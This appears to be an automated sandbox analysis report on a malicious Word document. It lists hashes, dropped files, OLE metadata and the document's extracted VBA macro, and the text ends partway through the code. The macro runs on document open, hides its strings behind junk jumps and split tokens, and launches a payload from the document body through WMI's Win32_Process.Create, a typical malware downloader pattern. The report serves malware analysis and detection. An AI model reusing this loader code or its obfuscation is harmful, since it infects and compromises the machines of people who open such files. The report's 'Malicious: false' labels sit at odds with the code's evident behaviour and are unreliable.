SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PFRB3UG5HRX28WJ8QB53.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5881561148756056
Encrypted:	false
SSDEEP:	96:chQCsMqaqvsqvJCwoaz8hQCsMqaqvsEHyqvJCworIzv1YXHxf8OElUVMIu:cyzoaz8ynHnorIzv+f8OcIu
MD5:	B2B3B8C4B5BAC696070CB8A396B51E48
SHA1:	0A090F56264D8D88CDAEE33A1A4ADEA00AEB5D98
SHA-256:	A01B8DEC05C6C174F2203647465336DDA852363A4DCD777918E80D6876F80561
SHA-512:	701447750465F6FEB9D1FE6A41E7EE4FDD917CB16D09D472DD2CC4F18230D3D7B68AC08542E080C321F5A0AA83E69F69F1F15FBF23540C392A8B159A2D6E7FAE
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\Desktop\~$t_513543.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
SHA-256:	D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
SHA-512:	3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	200625
Entropy (8bit):	7.475391947602444
Encrypted:	false
SSDEEP:	3072:COKwbpDnn9FfrNyVBYF0n3ajFq4weCp2S2MJdhzybMO8dSySA:COKsl9FTaBYF0nVp2MJHybR8dS9
MD5:	37B3837BF96BC1E918BBF3C7E955FA88
SHA1:	885E1DA8EF87295C316E254F88425D3EF65D11E4
SHA-256:	EE3E504EE93319F80FF033BFD1765607365F65DF62FA520936581AE03FFC5300
SHA-512:	4CEE4AB020AAFBA7B2CF6BD0549CF0F8F0992E38781AEED63AC748A7B5176DE27081EDDF71DDD0F5A47ECB604138F0F86BA3576D69152A7F26A98348892B7D98
Malicious:	false
Preview:	<!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site \| Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Incredible deposit Legacy Shoes Creative CSS Open-source, Author: Ambre Paris, Template: Normal.dotm, Last Saved By: Gabriel Thomas, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 5 10:15:00 2021, Last Saved Time/Date: Tue Jan 5 10:15:00 2021, Number of Pages: 1, Number of Words: 2640, Number of Characters: 15049, Security: 8
Entropy (8bit):	6.709486028547232
TrID:	Microsoft Word document (32009/1) 79.99% Generic OLE2 / Multistream Compound File (8008/1) 20.01%
File name:	dat_513543.doc
File size:	169385
MD5:	10ee2b89f3480381986269c71e7e19cd
SHA1:	462fdbfb243ee2285f5c0fa3472915fd509a3fe7
SHA256:	ac71b73f7ed0aada10d4eb9c288fc3af470cb7ea49955cd25d66997c5fd1e3c4
SHA512:	44a69d965dd701310b03b04b21c9ff1cf03c445b7a6f3d0abe441388f6a62b0e4035573a0d4d1094122922eb9f715ff299d303607dccb620906d390f77ed740a
SSDEEP:	3072:4D9ufstRUUKSns8T00JSHUgteMJ8qMD7gH:4D9ufsfgIf0pLH
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "dat_513543.doc"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Title:
Subject:	Incredible deposit Legacy Shoes Creative CSS Open-source
Author:	Ambre Paris
Keywords:
Comments:
Template:	Normal.dotm
Last Saved By:	Gabriel Thomas
Revion Number:	1
Total Edit Time:	0
Create Time:	2021-01-05 10:15:00
Last Saved Time:	2021-01-05 10:15:00
Number of Pages:	1
Number of Words:	2640
Number of Characters:	15049
Creating Application:	Microsoft Office Word
Security:	8

Document Summary
Document Code Page:	-535
Number of Lines:	125
Number of Paragraphs:	35
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	917504

Streams with VBA

VBA File Name: A5gd21klfqu9c6rs, Stream Size: 1117

General
Stream Path:	Macros/VBA/A5gd21klfqu9c6rs
VBA File Name:	A5gd21klfqu9c6rs
Stream Size:	1117
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 49 85 f4 e6 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
Private
VB_Exposed
Attribute
VB_Creatable
VB_Name
Document_open()
VB_Customizable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_TemplateDerived

VBA Code

Attribute VB_Name = "A5gd21klfqu9c6rs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
G8xesq0b8jlsfrsp
End Sub

VBA File Name: Owppnp8hah4xo788, Stream Size: 17915

General
Stream Path:	Macros/VBA/Owppnp8hah4xo788
VBA File Name:	Owppnp8hah4xo788
Stream Size:	17915
Data ASCII:	. . . . . . . . . \| . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . I . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 7c 06 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 83 06 00 00 a3 30 00 00 00 00 00 00 01 00 00 00 49 85 65 07 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
DpYbmDA
oAaNlB
vrYYHIDxI
WTbkNqFa
Object
RjiQHRA
"bBmgOCvPPojGGC"
MNihxICY
DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
GfRPP
tWcKo
OMZxxg
"lwWhZGEasjsS"
"deVdMyoREdgzCaJb"
fDZVKAAc:
uWZkeMFv.WriteLine
xLQtMd
nleaHR
gEcrV:
"OyFBLhlWUnD"
uWZkeMFv.Close
xsruLB
zDsRaIBGF
mgrwfmN
"XZzpBRpDKuMgsGHIHF"
"VrVKCjefsIJ"
pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
SblcDCC:
SQQWY
"hbtzFRJEXyDCXI"
iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
sCOIGDtD:
gxBPJB
jbUmDI
DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
"BnxHFzJCGhVHrFIm"
IcAHwPH
iFTmFHFH
STzBjwICv
kwzjKvZHe
fDZVKAAc.WriteLine
plqkuDI
RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
ZMdrVHGz:
SeHafBC
nhLeJMLfI
EISYDDB
EhCMG
UDSpFHqFJ
WlBWDXGD
"NisSEYrcDlKQUITa"
"dXFPCSYtSNB"
"NeiIGCNWgICn"
OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
mgrwfmN.Close
YVZXECEHD
FLtYjKHC
GfRPP.Close
idbaDIr
"dnUnKFHAkIOdD"
"nJJzFRjEWpRikxCD"
ANzGyzCD
MmSDYCkJR
"hKlajOujwgDFAA"
"eeVVJBMGlcfXMB"
RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
iHKuDmaEr:
"CcDmClHsnCC"
"UjBKOEDRIbiWFB"
QOrvJEB
"sxbwAfRtWJI"
UskmBJF
"KqVyuQQfwTWh"
tpOgXmm
fiyQuiRBI
gphNDVZp
vEBqHrDnD
PbhYVsA.Close
ZMdrVHGz.Close
"vVbvIHcFGEAJJ"
CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
KmGOADt
Resume
phIwFD
jPJENIo
AiRdGDAJ
KmGOADt.Close
"]an"
PnolTIbAB
"eEWdaDQVJJqTHgF"
gxBPJB:
eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
FYVZFEH
tzErBRFe
"LvnHAGHfIhRDBRAF"
NuebA:
sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
oQgLUI
SblcDCC.Close
HCvCmAcHC
"eXpjHFapHaPdRJu"
eepvDEaE
"DBvMcNtCcMyJDDI"
MHYlQAD
"ekluIEBJFIgoBcGC"
dXiwA
"MiCjaGqJfPrI"
eCIzUDyJ
RyDBDK
hFSyAfFrF
"fDdPHEjBEnAdZqZFJ"
zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
"MxCpGaGqBgemCAFEJ"
PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
sCOIGDtD.Close
uWZkeMFv
gzTFLxb
IePCGy
swNGWdd
qHKYGHlFA
OIbfvEEFF
CHVmaVC
ZMdrVHGz
TXmxvp
quDoH
iHKuDmaEr.WriteLine
KXTliE
ddanFDWJf
rJEkbLH
fNhiCVgGS:
noebIvSiu
YZllAeRe
VB_Name
"eXObOTlBAITEOIo"
mgrwfmN:
LzxxRHG
inIcjJtaF
EKmLA
uVItICICB
mgrwfmN.WriteLine
KXwaABT
fDZVKAAc.Close
Mid(Application.Name,
fmwdEMADQ
lBenBDA
SblcDCC
mgTNFCq
NuebA.WriteLine
hXxQDACJA
KmGOADt.WriteLine
HCvCmAcHC.Close
yJmmmVIAG
rYbgBh:
iHKuDmaEr.Close
NuebA.Close
hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
ZMdrVHGz.WriteLine
OlapGi
zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
"CVbRCAAhkhmcDG"
HCvCmAcHC:
BNmrm
rYbgBh
"WNFUDvHgghFdup"
uRnkDGJ
"qiXBsMBsLJGbX"
yabVbA
zBSWCKmJv
bbsIZ
"zdTcdOoXXUFHJK"
xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
RqlOZAHRJ
fNhiCVgGS.WriteLine
hjZwD
"EgxfIDVQbJotWhj"
"BUUJYAAIoJvLBLAo"
PcHRGIADo
wTMSLyWFG
sCOIGDtD
PbhYVsA:
"BndJDkuVYF"
KmGOADt:
"RhnJRGeBNASBQHHGF"
anyPG
"JTSPCDjykfL"
sreXHFD
"XrrAwQZPjqB"
hoyzuBGCP
UavHTIBHo
qAUhkIMz
EKezHIC
PjNhJNA
GznGGHyG
UwyYSBsBN
ORLICIl
cwsTFPCH
"]anw["
drZcHkCm
hDJDJ
NXbmIuHX
Function
"syYTHJShrguhzb"
AioOpBFE
xiFRA
fmwdEMADQ.WriteLine
gxBPJB.Close
NZiApKAp
gEcrV.Close
"mehEFPFHcklgJDDx"
iHKuDmaEr
pULquU
SblcDCC.WriteLine
pkixJADG:
xkQqDXCcD
GIAKA
"TubioGUTLadgXbA"
"anBQXljzGenE"
xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
fDZVKAAc
ecGmY
"ptABFEZDmkMVIeD"
"TBKmUCEXTUIGu"
"fxSJajCGlWUEBW"
rYbgBh.WriteLine
DhnHIY
sCOIGDtD.WriteLine
tAmQHxlD
tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
"wypNISsWSXthFJCq"
eLmLDU
jENfzNH
gEcrV.WriteLine
Nothing
"uTtCAFwHpCGF"
PbhYVsA
gEcrV
NuebA
"aqGiHISIbAoabV"
fNhiCVgGS.Close
jsYAGBJAF
RhztCF
lADFBaJ
FUyIHBDFz
sPkIwu
ViWsSIH
gxBPJB.WriteLine
zZuzBZGD
pkixJADG.WriteLine
MznOjBB
fmwdEMADQ.Close
sTzDC
"oLweAMoGsqVE"
diCXTi
GfRPP.WriteLine
Error
uWZkeMFv:
xPBGH
Attribute
sySRJ
"WLXLJnjItPGPZJ"
"JMgUDAIEJlgyNBH"
jzqBlGW
CFdSBD
pkixJADG.Close
ibIiBF
"qDaYIDDSZQMTaO"
pkixJADG
GfRPP:
LQqlBAHD
dLRiF
"ImJJdfAtdFHCh"
PbhYVsA.WriteLine
DkLoDL
RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
fNhiCVgGS
fmwdEMADQ:
rYbgBh.Close
zxgLHJSFW
HCvCmAcHC.WriteLine
hZCth

VBA Code

Attribute VB_Name = "Owppnp8hah4xo788"
Function G8xesq0b8jlsfrsp()
On Error Resume Next
Dhubl2is48jort = "Jsnt2t9fi0a8nnsiaf" + "Bete9x47doew46v"
sf4 = Zw1k7hcmdl66 + A5gd21klfqu9c6rs.StoryRanges.Item(2 / 2) + Hyii7r76oq89
   GoTo SblcDCC
Dim pULquU As Object
Set ibIiBF = diCXTi
Set pULquU = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim SblcDCC As Object
Set SblcDCC = pULquU.CreateTextFile("OMySJHB:\AyVGlHzV\jPNIAFF.VJueCC")
SblcDCC.WriteLine "VrVKCjefsIJ"
SblcDCC.WriteLine "sxbwAfRtWJI"
SblcDCC.WriteLine "WLXLJnjItPGPZJ"
Set jbUmDI = NZiApKAp
SblcDCC.Close
Set pULquU = Nothing
Set MznOjBB = vrYYHIDxI
Set SblcDCC = Nothing
SblcDCC:
t3s = "]anw[3" + "p]anw[3"
K50yjh8o6l7s = "]an" + "w[3ro]anw[3]a" + "nw[3ce]anw[3s]anw[3s]anw[3]anw[3"
   GoTo fNhiCVgGS
Dim RyDBDK As Object
Set WTbkNqFa = gzTFLxb
Set RyDBDK = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim fNhiCVgGS As Object
Set fNhiCVgGS = RyDBDK.CreateTextFile("YJYLAnEDp:\qjyoGCI\dkSAD.MSPmBF")
fNhiCVgGS.WriteLine "ImJJdfAtdFHCh"
fNhiCVgGS.WriteLine "deVdMyoREdgzCaJb"
fNhiCVgGS.WriteLine "XZzpBRpDKuMgsGHIHF"
Set OlapGi = PjNhJNA
fNhiCVgGS.Close
Set RyDBDK = Nothing
Set yabVbA = oAaNlB
Set fNhiCVgGS = Nothing
fNhiCVgGS:
Brlo236t2rmfu = "]anw[3:w]anw[3]anw[3i" + "n]anw[33]anw[32]anw[3_]anw[3"
   GoTo HCvCmAcHC
Dim iFTmFHFH As Object
Set UDSpFHqFJ = sySRJ
Set iFTmFHFH = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim HCvCmAcHC As Object
Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
HCvCmAcHC.WriteLine "uTtCAFwHpCGF"
HCvCmAcHC.WriteLine "lwWhZGEasjsS"
HCvCmAcHC.WriteLine "MiCjaGqJfPrI"
Set MmSDYCkJR = UwyYSBsBN
HCvCmAcHC.Close
Set iFTmFHFH = Nothing
Set EISYDDB = tpOgXmm
Set HCvCmAcHC = Nothing
HCvCmAcHC:
Iogna_9cq5gv = "w]anw[3in]anw[3m]an" + "w[3gm]anw[3t]anw[3]anw[3"
   GoTo gEcrV
Dim RqlOZAHRJ As Object
Set jsYAGBJAF = MHYlQAD
Set RqlOZAHRJ = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim gEcrV As Object
Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
gEcrV.WriteLine "dXFPCSYtSNB"
gEcrV.WriteLine "KqVyuQQfwTWh"
gEcrV.WriteLine "qDaYIDDSZQMTaO"
Set IePCGy = GznGGHyG
gEcrV.Close
Set RqlOZAHRJ = Nothing
Set cwsTFPCH = bbsIZ
Set gEcrV = Nothing
gEcrV:
Fo4b_d8mj9usjgaha = "]anw[3" + "]anw[3" + Mid(Application.Name, 4 + 2, 2 - 1) + "]anw[" + "3]anw[3"
   GoTo ZMdrVHGz
Dim xsruLB As Object
Set fiyQuiRBI = swNGWdd
Set xsruLB = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim ZMdrVHGz As Object
Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
ZMdrVHGz.WriteLine "MxCpGaGqBgemCAFEJ"
ZMdrVHGz.WriteLine "hbtzFRJEXyDCXI"
ZMdrVHGz.WriteLine "zdTcdOoXXUFHJK"
Set xPBGH = rJEkbLH
ZMdrVHGz.Close
Set xsruLB = Nothing
Set dLRiF = vEBqHrDnD
Set ZMdrVHGz = Nothing
ZMdrVHGz:
K427k3xfk130n18n = Iogna_9cq5gv + Fo4b_d8mj9usjgaha + Brlo236t2rmfu + t3s + K50yjh8o6l7s
   GoTo fDZVKAAc
Dim tzErBRFe As Object
Set SeHafBC = tWcKo
Set tzErBRFe = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim fDZVKAAc As Object
Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
fDZVKAAc.WriteLine "hKlajOujwgDFAA"
fDZVKAAc.WriteLine "JMgUDAIEJlgyNBH"
fDZVKAAc.WriteLine "BUUJYAAIoJvLBLAo"
Set CHVmaVC = LzxxRHG
fDZVKAAc.Close
Set tzErBRFe = Nothing
Set WlBWDXGD = EKezHIC
Set fDZVKAAc = Nothing
fDZVKAAc:
Lutf6_3d403q9 = Jlda77h_v8nx5(K427k3xfk130n18n)
   GoTo rYbgBh
Dim hZCth As Object
Set LQqlBAHD = DpYbmDA
Set hZCth = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim rYbgBh As Object
Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
rYbgBh.WriteLine "CVbRCAAhkhmcDG"
rYbgBh.WriteLine "XrrAwQZPjqB"
rYbgBh.WriteLine "fxSJajCGlWUEBW"
Set phIwFD = hDJDJ
rYbgBh.Close
Set hZCth = Nothing
Set PnolTIbAB = dXiwA
Set rYbgBh = Nothing
rYbgBh:
Set Mwzin4vxc1irit = CreateObject(Lutf6_3d403q9)
   GoTo GfRPP
Dim xLQtMd As Object
Set uRnkDGJ = hFSyAfFrF
Set xLQtMd = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim GfRPP As Object
Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
GfRPP.WriteLine "qiXBsMBsLJGbX"
GfRPP.WriteLine "mehEFPFHcklgJDDx"
GfRPP.WriteLine "BndJDkuVYF"
Set xiFRA = hXxQDACJA
GfRPP.Close
Set xLQtMd = Nothing
Set jENfzNH = xkQqDXCcD
Set GfRPP = Nothing
GfRPP:
Jaaqx1xn5daotw = Mid(sf4, (1 + 4), Len(sf4))
   GoTo sCOIGDtD
Dim eepvDEaE As Object
Set jzqBlGW = lBenBDA
Set eepvDEaE = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim sCOIGDtD As Object
Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
sCOIGDtD.WriteLine "JTSPCDjykfL"
sCOIGDtD.WriteLine "bBmgOCvPPojGGC"
sCOIGDtD.WriteLine "anBQXljzGenE"
Set tAmQHxlD = UavHTIBHo
sCOIGDtD.Close
Set eepvDEaE = Nothing
Set gphNDVZp = IcAHwPH
Set sCOIGDtD = Nothing
sCOIGDtD:
   GoTo fmwdEMADQ
Dim DkLoDL As Object
Set plqkuDI = BNmrm
Set DkLoDL = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim fmwdEMADQ As Object
Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
fmwdEMADQ.WriteLine "dnUnKFHAkIOdD"
fmwdEMADQ.WriteLine "ekluIEBJFIgoBcGC"
fmwdEMADQ.WriteLine "BnxHFzJCGhVHrFIm"
Set jPJENIo = FLtYjKHC
fmwdEMADQ.Close
Set DkLoDL = Nothing
Set ANzGyzCD = qAUhkIMz
Set fmwdEMADQ = Nothing
fmwdEMADQ:
Mwzin4vxc1irit.Create Jlda77h_v8nx5(Jaaqx1xn5daotw), V2enhc4htwl7z6bh, Thriap3q9rgf3yy9y
   GoTo pkixJADG
Dim DhnHIY As Object
Set oQgLUI = zZuzBZGD
Set DhnHIY = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim pkixJADG As Object
Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
pkixJADG.WriteLine "fDdPHEjBEnAdZqZFJ"
pkixJADG.WriteLine "wypNISsWSXthFJCq"
pkixJADG.WriteLine "LvnHAGHfIhRDBRAF"
Set ecGmY = OIbfvEEFF
pkixJADG.Close
Set DhnHIY = Nothing
Set EKmLA = eLmLDU
Set pkixJADG = Nothing
pkixJADG:
   GoTo KmGOADt
Dim CFdSBD As Object
Set nhLeJMLfI = FYVZFEH
Set CFdSBD = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim KmGOADt As Object
Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
KmGOADt.WriteLine "DBvMcNtCcMyJDDI"
KmGOADt.WriteLine "eXpjHFapHaPdRJu"
KmGOADt.WriteLine "eXObOTlBAITEOIo"
Set STzBjwICv = hoyzuBGCP
KmGOADt.Close
Set CFdSBD = Nothing
Set ORLICIl = lADFBaJ
Set KmGOADt = Nothing
KmGOADt:
End Function
Function Jlda77h_v8nx5(Wwsqkhmtfcf3_y)
On Error Resume Next
   GoTo PbhYVsA
Dim PcHRGIADo As Object
Set TXmxvp = SQQWY
Set PcHRGIADo = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim PbhYVsA As Object
Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
PbhYVsA.WriteLine "eEWdaDQVJJqTHgF"
PbhYVsA.WriteLine "OyFBLhlWUnD"
PbhYVsA.WriteLine "TBKmUCEXTUIGu"
Set qHKYGHlFA = ddanFDWJf
PbhYVsA.Close
Set PcHRGIADo = Nothing
Set sPkIwu = RhztCF
Set PbhYVsA = Nothing
PbhYVsA:
Gqzsjl136wugk27i9 = Wwsqkhmtfcf3_y
   GoTo NuebA
Dim sTzDC As Object
Set GIAKA = kwzjKvZHe
Set sTzDC = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
Dim NuebA As Object
Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
NuebA.WriteLine "NeiIGCNWgICn"
NuebA.WriteLine "EgxfIDVQbJotWhj"
NuebA.WriteLine "UjBKOEDRIbiWFB"
Set idbaDIr = inIcjJtaF
NuebA.Close
Set sTzDC = Nothing
Set KXwaABT = zBSWCKmJv
Set NuebA = Nothing
NuebA:
Gnc9qzz9241pnhfi = Hrs2a1p95u19(Gqzsjl136wugk27i9)
   GoTo gxBPJB
Dim zxgLHJSFW As Object
Set quDoH = KXTliE
